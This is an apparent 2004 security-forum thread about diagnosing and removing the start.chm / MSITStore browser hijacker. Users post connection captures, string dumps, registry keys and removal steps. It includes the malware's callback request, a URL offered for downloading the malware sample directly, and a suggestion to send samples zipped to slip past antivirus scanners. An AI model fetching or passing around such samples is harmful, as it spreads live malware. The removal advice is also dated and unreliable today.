Hey all,

Something isn't right here. I've been hit with that mkstore problem that auto-executes rubbish on your system. Except this one just won't go away.

You know the problem I'm talking about, so let me get right to it. First, I think creating a write protected 0 byte start.chm file prevents the thing from "infecting" your machine, but not running access[1].exe - killing the access[1].exe task prevents it from coming back. Second, I've seen a new variant of this which runs a cmd.exe that takes 100% cpu - killing that solves the problem.

In brief. I've run ad-aware, spybot and hijack this. I know what I'm doing and the hijack this output shows nothing unusual. I tried to procdump the exe and disassemble it, but all I got was a load of garbage. I haven't tried softice on it yet.

Does anyone know exactly how to confirm whether this thing is still on my machines, or whether it's just coming back when I'm browsing sites? If I know it's not there then I can at least start from a "known good" point when hacking it apart.

An observation... It seems to return shortly after I go to EBay, which is somewhat interesting. Also if you boot up, use the system normally but don't run IE, the spyware doesn't start which leads me to believe it's either some cleverly hidden browser hook (which I really doubt), it's a hidden task that waits for iexplore.exe to load (which is possible, if the footprint is small enough the process won't show up), or it's coming back when browsing to a website.

Any help on confirming it's not on my system is appreciated. Then I'll attack this little POS with my trusty copy of wdasm... Rule #1 for whatever idiot wrote this, never annoy a coder.

http://www.wilderssecurity.com/showthread.php?t=28658

look at post number 9

If you mean the one posted at April 22nd, 2004, 04:47 AM by Unzy, titled

"Re: CWS Variants
start.chm / MSITStore (MasterSearch)

A new type of CWS variant that uses an exploit to reset a user's homepage."

That doesn't help much :). I don't have those browser pages set, and the thing keeps coming back.

I'm just not convinced that by removing the chm, the .exe process and the pages it removes the spyware. It's coming back somehow, and unless Ebay or Yahoo are using it then it's got to be from the local machine.

look at my edit saying about emptying temp files

several hiajckers are using the exploit now not just master search

Nothing there except an interesting batch file that doesn't do anything...

Hey guest, I noticed that even with cwshredder & hjthis clean & no start.chm file present, the thing seems to do this: when any app initially connects to the internet, or any type of help file is accessed, shortly afterward an additional TCP connect is made under that process to an IP in Russia, which then closes quickly, you can't see it with netstat, I used Port Explorer to watch it and identify the IP (which is the same each time).

I'm beginning to think it may be able to eventually download the new start.chm & registry crap after repeating this with virtually every process that connects to the net.

Anyway, since I blocked the IP range 81.211.105.* from leaving my router & banned the IP range from incoming at my computer firewall, none of the start.chm or registry crap has reappeared (5 days now). The critter still trys to call home with each process that accesses the net, but it can't get out anymore. If you use a tool like Port Explorer you should be able to see it on your machine. Hope this helps.

Interesting, thanks for adding that.

Next time it happens, can you try using FPORT on it? FPort maps network connections to processes & files, you can get it from Foundstone (http://www.foundstone.com/knowledge/proddesc/fport.html). That will tell you what is making the outgoing connection...

I think you guys might be on to something here. I've had the same inability to completly remove this virus. I get everything cleaned up, and as soon as I reboot, Spyware Guard tells me something is trying to change my home page again. After reading this post, it hit me that this occurs right after my startup process starts something called NIS Time, which is a software tool to check/set the system time. This is the first time anything on my pc tries to go out over the net.

I downloaded Fport and tried running it. I get the following results:


FPort v2.0 - TCP/IP Process to Port Mapper
Copyright 2000 by Foundstone, Inc.
http://www.foundstone.com

Pid Process Port Proto Path
284 svchost -> 135 TCP C:\WINDOWS\system32\svchost.exe
4 System -> 139 TCP
4 System -> 445 TCP
992 svchost -> 1025 TCP C:\WINDOWS\System32\svchost.exe
4 System -> 1026 TCP
1660 Explorer -> 1355 TCP C:\WINDOWS\Explorer.EXE
1624 -> 5000 TCP
3084 aim -> 5180 TCP C:\Program Files\AIM95\aim.exe

0 System -> 123 UDP
0 System -> 137 UDP
0 System -> 138 UDP
284 svchost -> 445 UDP C:\WINDOWS\system32\svchost.exe
4 System -> 1027 UDP
1660 Explorer -> 1032 UDP C:\WINDOWS\Explorer.EXE
1624 -> 1100 UDP
992 svchost -> 1148 UDP C:\WINDOWS\System32\svchost.exe
0 System -> 1900 UDP
3084 aim -> 1900 UDP C:\Program Files\AIM95\aim.exe

What I'm not clear on is how I could use this tool to see what is trying to get to the russian ip address. Fprot seems to take a snapshot of port ownership. If something is grabbing a port to reach out to the russian ip, then almost immediately releases that port, how would this catch it? I'm wondering if I should download and try ZoneAlarm. If I recall, you can set that so anything that tries to access the net will get flagged and held up pending permission.

Tim

Ok, I installed Zone Alarm and set it to require permissions before anything goes out over the internet. I disabled my NISTIME because of timing problems - it seemed to want to do its thing before ZoneAlarm was fully initialized. The following files requested access to the internet as part of start up processes:

svchost.exe
explorer.exe
msbntray.exe

The Spygware Guard message about my home page being changed popped up after I granted access for explorer.exe to use the net. I wonder if the virus is somehow attaching to that file?

Tim

explorer shouldn't need to access the net, you should block that with ZA

the svchosts entries will need to access and msbntray will

we know that a lot of the cws baddies attach to explorere that is why we had you run the pv looking for the dll that had attached itself
and nothing was showing in your logs

Derek, which PV option was that? I think I was asked to use option 1 and option 7 at different points. Whichever is the right one, I'd like to try again if you don't mind since explorer.exe seems to want to talk to the internet.

Thanks. Want me to post the results back over in my own thread?

Tim

either option 1 or 2 are the explorer & Internet explore dlls
but if they didn't show last time, they aren't likely to show this time

{QUOTE-> ...Next time it happens, can you try using FPORT on it?[/url]). That will tell you what is making the outgoing connection... <-QUOTE}

I don't think you will see it with FPROT. PE shows real time events as they happen, and logs the events, second by second.

The TCP connect happens, then exactly 21 seconds later it closes. The same process that made the net connection (for example, iexplore.exe) same PID, is the process that does the connect to the Russian IP but on another local port (looks like the next available port), and with 0.0.0.0 local address rather than 192.168.x.x

If I have the Ruskie IP blocked from outgoing to the WAN at the router, the Ruskie port closes 21 seconds after it opens and thats all. If the Ruskie IP is not blocked from outgoing to the WAN, the Ruskie port closes 21 seconds after it opens, AND THEN for a few minutes the remote Ruskie IP port 80 will try some incoming connects to my computer (2 times on three different ports, then quit). The incoming attempts are blocked at my firewall and logged there since I've got the IP entered as an incoming banned IP.

It's not only iexplore.exe connecting to the net that gets the Ruskie IP in action, but also other stuff like mcafee security center processes that connect to the net.

I'm getting kinda blurry-eyed from looking at these logs & stuff now, but maybe I ought to run some kind of dll checks sometime and have the guys here check 'em out.

Microsoft has released an update to help solve this problem.
ore info can be found here. http://www.microsoft.com/technet/security/bulletin/MS04-004.mspx
. :-X

The same thing is happening to me. Since I created the readonly start.chm and start.html files, my browser isn't being hijacked anymore. But I'm still getting the access[1].exe files and the high-CPU cmd.exe's.

I installed Port Explorer, and am seeing the same behaviour DB123 described -- namely, normal connections are followed by a connection to 81.211.105.70.

With Port Explorer, I was able to see what was in those connections:

GET /report/reportsync.php?cid=64446bc9-e268-4a54-8597-ec057ab4dcfc
HTTP/1.1
Accept: */*
XXXXXXXXXXXXXXX: XXXXXXXXXXXXX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: main.tibssystems.com
Connection: Keep-Alive

This downloads access.exe, which gets stored in the cache and executed as access[1].exe.

You can get the access.exe file by going directly to http://81.211.105.70/report/reportsync.php. Obviously, just save it. Can someone disassemble it and tell us what it's latching itself onto so that we can get rid of it once and for all?

Can anyone get me a sample of the access[1].exe ?

I think it holds the solution to this mystery.

(Got plenty, thanks to all that submitted)
Preferably zipped up, so it doesn't get intercepted by any AV-scanners.

Regards,

Pieter

I too have this hacker omy PC and have been frustrated because it's unknown how to remove all components and all suggested solutions are about hiding the symptoms rather than curing the disease.

I don't want to take over tghis posting, just wanted to say that this is the most convincing posting I've seen in terms of finding a solution and wish you guys well.

Okay, I'm at work at the minute but wanted to add this.

If anyone can send me the flat access[1].exe file, I can disassemble it. Alternatively we need to find out how it gets launched. The reason for this is as follows.

The aim is to get the exe in a "virgin" state on disk to disassemble. Simply ripping it out of memory with procdump won't do this as the exe will by definition change its internal states as it executes.

What we need to do is to find the launch point. When we know that, we can set a bpx (breakpoint in execution) in Softice, and find the first line of code of the exe. We then change that to a jmp esi, which puts it in an infinite loop. Then we can use procdump to get a virgin copy that can be disassembled. It's the same technique used to reverse engineer upx'd & compressed exe's.

The post above about the php file is very promising. What's annoying is I patched hh.exe (the CHM file reader for Windows) to prompt whenever a CHM file was executed - it didn't warn me, but access[1].exe came back. So the comment I read elsewhere about preventing chm files from being launchable doesn't seem to hold true.

Are there any other coders/reverse engineers/crackers here that can work with me on this?

I found 5 ACCESS[1].EXE-*.pf files in my c:\windows\prefetch dir that might help...

{QUOTE-> Okay, I'm at work at the minute but wanted to add this.

If anyone can send me the flat access[1].exe file, I can disassemble it. Alternatively we need to find out how it gets launched. The reason for this is as follows.
<snip>

this cws hijacker comes back normally and we are still working on ways to kill it off permanently
what works for some doesn't work for others, but some get rid of it fairly easily

a workaround seems to be install a good firewall, lists here http://www.wilders.org/firewalls.htm and block these ranges of ports, both incoming and outgoing 209.66.114.0-209.66.115.255 and 81.211.105.0-81.211.105.255
that stops the known cws servers responding or the hidden files on your computer updating. This works sometimes but not always, but it's a help. The problem with this approach is that some good sites might also be blocked
then
kill it off using shredder etc and hjt as advised while disconnected from the net

Gurth, thanks for the offer but the -pf is junk. Rakewell got it in 1, download that with a dl manager (getright, flashget), rename it to an exe and it's a valid PE file.

Here's a start, don't have much time right now but I'll set up a sandbox and start hitting this POS. It was coded with Visual C++ (VC6 I believe). Here's some interesting strings in the table (just look at the end of the line, the start is the offset and the type). THe worrying one is "wininet.dll", it might be patching it. My wininets are all the right size & date, so perhaps Windows FileProt fixed it for me...

24672,Char,11,tibsystems.
24684,Char,13,statsbank.com
24700,Char,15,boards.cexx.org
24716,Char,22,adultwebmasterinfo.com
24740,Char,12,spywareinfo.
24756,Char,15,dialerschutz.de
24772,Char,18,webmasterworld.com
24804,Char,18,go****yourself.com
24824,Char,17,FindCloseUrlCache
24844,Char,22,FindNextUrlCacheEntryA
24868,Char,23,FindFirstUrlCacheEntryA
24892,DLL,11,wininet.dll
24970,Char,22,if exist %1 goto start
25012,Char,41,SOFTWARE\Microsoft\Internet Explorer\Main
25056,Char,10,Start Page
25068,Char,13,::/start.html
25084,Char,14,mk:@MSITStore:
25100,Char,10,\start.chm
37287,Char,11,/$FIftiMain
37318,Char,15,/arrow_left.gif
37340,Char,16,/arrow_right.gif
37363,Char,13,/ham01000.jpg
37383,Char,13,/ham01001.jpg
37403,Char,13,/ham01100.jpg
37423,Char,13,/ham01200.jpg
37443,Char,13,/ham01300.jpg
37463,Char,13,/ham01400.jpg
37483,Char,13,/ham01500.jpg
37503,Char,13,/ham01600.jpg
37523,Char,13,/ham01700.jpg
37543,Char,13,/ham01800.jpg
37563,Char,13,/ham01900.jpg
37583,Char,13,/ham02000.jpg
37603,Char,13,/ham02001.jpg
37623,Char,13,/ham02100.jpg
37643,Char,13,/ham02200.jpg
37663,Char,13,/ham03000.jpg
37683,Char,13,/ham04000.jpg
37703,Char,13,/ham05000.jpg
37723,Char,13,/ham06000.jpg
37743,Char,13,/ham07000.jpg
37763,Char,13,/ham08000.jpg
37783,Char,13,/ham09000.jpg
37818,Char,13,/mo000000.jpg
37853,Char,12,/poker_t.gif
37872,Char,11,/start.html
37889,Char,13,/sto00000.gif
37909,Char,13,/to000000.jpg
37929,Char,20,::DataSpace/NameList
37951,Char,42,<(::DataSpace/Storage/MSCompressed/Content
37998,Char,46,P,::DataSpace/Storage/MSCompressed/ControlData
38047,Char,42,)::DataSpace/Storage/MSCompressed/SpanInfo
38092,Char,48,/::DataSpace/Storage/MSCompressed/Transform/List
38141,Char,98,<&_::DataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/
38242,Char,106,i::DataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/ResetTable
41266,Unichar,12,Uncompressed
41294,Unichar,12,MSCompressed
41320,Unichar,19,{7FC28940-9D31-11D0
41474,Char,21,HHA Version 4.74.8702
41540,Char,10,start.html
70070,Char,10,vs3+:D)&Op
83737,Char,11,S7K$Lj9SVlX


Here are the interesting imports:

22006,Function,11,FreeLibrary
22020,Function,14,GetProcAddress
22038,Function,12,LoadLibraryA
22066,Function,14,FindFirstFileA
22096,Function,12,GetTickCount
22124,Function,12,GetTempPathA
22140,Function,23,GetEnvironmentVariableA
22166,Function,18,GetModuleFileNameA
22200,Function,11,CloseHandle
22226,Function,11,CreateFileA
22240,Function,12,LockResource
22256,Function,12,LoadResource
22272,Function,13,FindResourceA
22296,Function,14,SizeofResource
22326,Function,14,GetProcessHeap
22354,DLL,12,KERNEL32.dll
22370,Function,21,GetKeyboardLayoutList
22392,DLL,10,USER32.dll
22406,Function,11,RegCloseKey
22420,Function,14,RegSetValueExA
22438,Function,13,RegOpenKeyExA
22452,DLL,12,ADVAPI32.dll
22468,Function,13,ShellExecuteA
22482,DLL,11,SHELL32.dll
22496,Function,16,GetModuleHandleA
22516,Function,15,GetStartupInfoA
22534,Function,15,GetCommandLineA
22552,Function,10,GetVersion
22566,Function,11,ExitProcess
22580,Function,16,TerminateProcess
22600,Function,17,GetCurrentProcess
22620,Function,24,UnhandledExceptionFilter
22648,Function,23,FreeEnvironmentStringsA
22674,Function,23,FreeEnvironmentStringsW
22700,Function,19,WideCharToMultiByte
22722,Function,21,GetEnvironmentStrings
22746,Function,22,GetEnvironmentStringsW
22772,Function,14,SetHandleCount
22790,Function,12,GetStdHandle
22806,Function,11,GetFileType
22820,Function,13,GetVersionExA
22836,Function,11,HeapDestroy
22850,Function,10,HeapCreate
22864,Function,11,VirtualFree
22890,Function,12,VirtualAlloc
22906,Function,11,HeapReAlloc
22954,Function,19,MultiByteToWideChar
22976,Function,12,LCMapStringA
22992,Function,12,LCMapStringW
23008,Function,14,GetStringTypeA
23026,Function,14,GetStringTypeW

Okay, I'm convinced we're missing something. The only sites I've been to have been known-good ones. So unless this site, Ebay, yahoo or NukeCops are causing this spyware to be downloaded, it's still on my machine.

Anyone got any ideas? There's no point disasm'ing this thing if I can't get it cleaned...

Another possibility. I think EBay may be involved. I tracked down the copy of Access[1].exe to the exact time I was logged into my ebay UK account. In Ebay UK "My Account", there is a banner advert top-center of the page - I'm wondering if one of the adverts they show is causing this hijack.

Incidentally you won't be able to find the exe in the IE cache/history, you'll have to reboot and delete everything in your profile/local settings/temporary internet files from a cmd prompt or non-Explorer tool (such as DOpus).

Can anyone with an EBay UK account keep an eye out and see if they see anything similar?

It's nothing specific to eBay.

The hacker waits until you connect to the internet then downloads it stuff. If you make a connection using say Outlook hooked up to your hotmail account you'll experience the same problem.

Read around and look at the many other postings on this virus and you'll see what people are discovering about this new pest.

It could be anything. Maybe a banner that eBay is displaying, or maybe something in a person's ad. I don't know.

What concerns me more is the possibility that the infection (the part that makes IE go pull down that php file) comes from a difference source, and access[1].exe doesn't actually infect machines. In which case, reverse engineering access[1].exe won't tell us how to make IE stop pulling it down.

Maybe all access[1].exe does is pop up the $3.5 million lottery window via cmd.exe? (I've always killed cmd.exe to get rid of that popup, so I don't know what happens when you click either button.)

Actually, what you posted doesn't include the string about $3.5M, but it was in another post here where someone posted their results of disassembling access.exe. I wonder if there are multiple versions or if it mutates? What's the md5 hash one the version you've got? (I'm not sure how to get the hash in plain Windows. I've got cygwin and it includes md5sum.)

The hash on the version I have is: f56b2442dcd2f553b2fdd060c00bf99e

Thanks dempapa!

That link had very useful info. I've got a c_10230.dll file in windows\system32. It has the same modification date/time as most of the standard windows files, but it contains the string "tibsdown.dll". And since we know that tibssystems is somehow connected to this hack, I don't take this to be a good sign. (Also among the strings at the end are "urlmon.dll", "CoCreateGuid", "UuidToString", "URLDownloadToCacheFile", and "DllRegisterServer." I know virtually nothing about Windows internals, but this sounds like the kind of things this hack is doing.)

I've also got the registry key HKCR\CLSID\{869ee607-5376-486d-8dac-edc8e239ad5f} and it has one subkey: InprocServer32 with value c:\windows\system32\c_10230.dll.

That CLSID is referenced in HKLM\Software\Microsoft\Internet Explorer\Extensions\{869<etc>}. I'm guessing I need to delete this key as well, and check the other five extensions to make sure they're legit.

I recognize four of the extensions. But this 869 one and {9DBB80E2-B571-4756-8A5F-AD3994C9B4F3} have nothing but a CLSID so the 9DBB<etc> one makes me nervous too.

And rightly so. HKCR\CLSID\{9DBB<etc>} runs access[1].exe from my temporary internet files.

I'm going to look at these items on my uninfected machines and see what the difference is, then try making this machine look the same. I think it will just be a matter of deleting those four registry keys. What I have to check is whether c_10230.dll is supposed to exist or not.

Will post my results once I've tried this.

Rakewell,

As per my post at:

http://www.spywareinfo.com/forums/index.php?act=ST&f=30&t=42784&hl=&view=findpost&p=215180

Looking at Proxomitron header logs, I discovered that the trojan was attempting to contact main.tibssystems.com. When it failed it tried main-news-com.com.

When it succeeded, it downloaded a file - access.exe - 3072 bytes in length which then executed from the Tempoary Internet Files\Content.IE5 cache.

I tracked down the culprit as crt32_v2.dll - a 19,968 byte file - renaming it stopped all attempts to contact the websites and stopped the downloading of access.exe.

HKEY_CLASSES_ROOT\CLSID\{869EE607-5376-486d-8DAC-EDC8E239AD5F}\InprocServer32

Pointed to C:\WINDOWS\SYSTEM\CRT32_V2.DLL

This would seem to be the same as your C_10230.DLL.

In all I have 7 Registry entries containing {86EE607-etc.} and 2 of them refer to crt32_v2.dll.

Cripple that file by renaming it and the exploit stops running.

Thanks, Fireflyer.

It's good to know that once I delete these registry entries, I should be OK. I've applied the MS patch

FYI, the access.exe that I got was 88K (90112 bytes). There must be lots of variants going around. As it is, the one I had doesn't seem too bad. Something running as access[1].exe has pretty obviously come from the internet. Some of the other ones I've ready about that disguise themselves as real applications ("Internet Optimizer", "TV Media") must be harder to recognize as the source of the problem.

Anyway, I hope that internet security products are going to start looking at the IE extensions. Warning us when something tries to add an extension, blocking the CLSID's that are known to be evil (for the the real-time scannres), and showing us all our extensions so we can make sure we recognize them all (for the after-the-fact scanners like HJT and Spybot).

I'm glad that's over. This is the first time I've had one of these things since ILOVEYOU back a few years ago.

Thanks everyone for your help!

Check this out:

http://www.freedomlist.com/forum/viewtopic.php?t=16135

Speaking of registry entries, here are 6 of interest and their contents from my XP (he) machine:

------------------------
HKEY_CLASSES_ROOT\CLSID\{869EE607-5376-486d-8DAC-EDC8E239AD5F}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{869EE607-5376-486d-8DAC-EDC8E239AD5F}\InprocServer32

C:WINDOWS\System32\c_10230.dll
-------------------------

-------------------------
HKEY_CURRENT_USER\Software\Microsoft\Search Assistant\ACMru\5603
HKEY_USERS\S-1-5-21-2555084713-1658777684-3585553489-1007\Software\Microsoft\Search Assistant\ACMru\5603

c_10230.ddl
crt32_v2.dll
imapi.exe
helpctr.exe
hh.exe
tibsystems
hkdp
-------------------------

-------------------------
HKEY_CURRENT_USER\Software\Microsoft\Search Assistant\ACMru\5604
HKEY_USERS\S-1-5-21-2555084713-1658777684-3585553489-1007\Software\Microsoft\Search Assistant\ACMru\5604

tibsystems
-------------------------

Hi,
Running Win98-SE
Been following the gameplay and having an amateurish stab ... Sent some data to Pieter .... Have deleted my C_10230.dll file and the several registry 'extension' keys .... Deleted the old 'start.chm' file ... reapplied the latest MS updates from old Bill Insecure-Gates and have been running for a fair time with no recurrence ....
Techfacts XP .... (works ok on 98-SE) shows the history line for example accessing (ugh !!) Notepad help ... now like this :-
Visited; Default@mk:@MSITStore:C:\WINDOWS\HELP\Notepad.chm::/default.htm

I believe I am right in thinking this is a perfectly legitimate Windows statement ... the MSITStore is the MS on-line help facility ??, don't know about the @mk part ??.... But even I can see this is possibly a creaky piece of software ... How can Windows know if the .htm is unsafe or just part of another software's help ?????

Very helpful here, thanks folks.

Pipme (Makino)

Running post (I'm always tooooo busy), hh.exe is a valid windows file, it's the hypertex help processor that loads CHM files. Think I posted this elsewhere but the exploit/spyware does not use hh.exe to do its stuff. I patched my copy of hh.exe to prompt whenever it was used - I got reinfected, but no warning popped up. This is probably because the class used for interpreting CHM files (IDocHTML or something, don't recall off the top of my head) is held in a different dll.

The post moved into this forum today titled as "Solution" does work...

Edit. I goofed! ::)

Maybe I'm getting confused now, but I definately saw a reference to wininet.dll somewhere which is perhaps where the retrieval was taking place. Also bear in mind that if it's obfuscated and the socket dll's are loaded with late binding (LoadLibrary, GetProcAddress etc), the only way to find it is by stepping through the code. Which I didn't want to do until I had a surefire way to clean it.

Shadowwar,

As I posted before, I renamed crt32_v2.dll (19.5 KB) and all my problems cleared up.

This snippet is from the file:

http://main.dlÁþîÿy-news-com./report¶ûísta.php?9= ;t*{ûibssy!ems8SOFTWA
ø°êRE\

The reference to main-news-com.com and tibssystems.com seems apparent to me. Also, when it was "phoning home", the Proxo header looked like this:

+++GET 1621+++
GET /report/reportstats.php?cid=a1a35e01-814e-11d8-9cdf-etc.

with the reference to report and .php as seen above.

I am using W98SE and offline browsing is working fine.

Hello everyone,

I had this problem and everytime the nice folks on these forums, such as Pieter Arntz and CrazyM, would kindly give me suggestions the bugger kept coming back.

I finally found a thread (thanks to Grummy) that helped me get rid of it, for good this time (fingers crossed). A person that goes by Shadowar has created a fix for this. If you have this problem than you need to look at this thread:
http://forums.net-integration.net/i...showtopic=13515

Thank you, everyone for your help!

Travis

Almost forgot,

After you perform this fix, YOU MUST DOWNLOAD ALL CRITICAL UPDATES. It's a new exploit that Microsoft just released a patch to fix.

Don't forget to delete all temporary internet files and offline content too. Check your "notepad.exe" properties on your hard drive to make sure they are Microsoft. You should have more than one "notepad.exe" on your hard drive so check them all.

Take it easy :)

Travis

Travis,

I know you mean well, but I would like to point out our policy regarding help in this forum: http://www.wilderssecurity.com/showthread.php?t=26290

One other point. The person that came up with the fix (Shadowwar) is a Moderator at this forum, so you don't have to worry about us not being aware of its existence.

I removed the other posts regarding this object you posted and merged these posts with the other thread regarding this subject.

Regards,

Pieter

Pieter, It must be difficult to make sure that everyone is getting the best advice on a forum of this size.

I have to admit I am a little embarassed. When I first came to this forum, looking for help on with this Hijack I read the post that you referenced, but at the time, I did not understand what it meant. I thought that perhaps it was meant only for those who give advice on the HijackThis logs, which I wasn't doing. Sorry for the misunderstanding.

Travis

No problem. Those forums consist of two separate parts. One were the "live help" is given and one where we post the fixes for the most common and hard to fix infections.
The discussion among members about fixes they found is done here in Privacy Problems. That is probably not the clearest way to set it up, but those forums are relatively young and still "developing"

Regards,

Pieter

I goofed. >:( ::)



I dumped the 20k file and low and behold all the urls that this thing contacts are in there. It is not a valid windows file. The other 4k dll i got from someone through me for a total loop.

This one is unique in using the extensions key. Never saw one use that before.

Of course Hijackthis doesn't show that one. :o

got overly cautious with this thing cause i never dealt with an extension hijack.

Moral of the story.. If it smells like a rat. Looks like a rat. It must be a rat.

*puppy*

Just a heads up. If your HijackThis Log file contains :

mk:@MSITStore:C:\WINDOWS\start.chm::/start.html

Then this tool developed by Shadowwar will kill the CHM Hijack:

Please download this tool to fix the start.chm hijack.

http://tools.zerosrealm.com/startchmfix.exe

Download it to preferably the Desktop . Run it and it will extract the folder to the desktop.

Open the folder after extracted.

Please make sure all Internet Explorers are closed.

Double click the fix.bat

Only run it once or you will lose the backups although they shouldn't be needed.

Notepad will open at the end with a message and the bad file listing at the end. Please post that bad file listing line here. The Tool is designed so that if it is unable to remove the file, it will tell the user to reboot and will remove it on Reboot.

If no files show in the bad file listing then do a Reboot and do a search for either of these highlighted files and DELETE them:

C:\Windows\System32\ C_10230.DLL or
C:\Windows\System\crt32_v2.dll

Reboot and rescan with HijackThis and post a new log file.

Don't forget to delete all temporary internet files and offline content too.

Most Important, Go to Windows Update and install ALL critical updates.

Shadowwar's routine worked like a charm

C:\Windows\System\crt32_v2.dll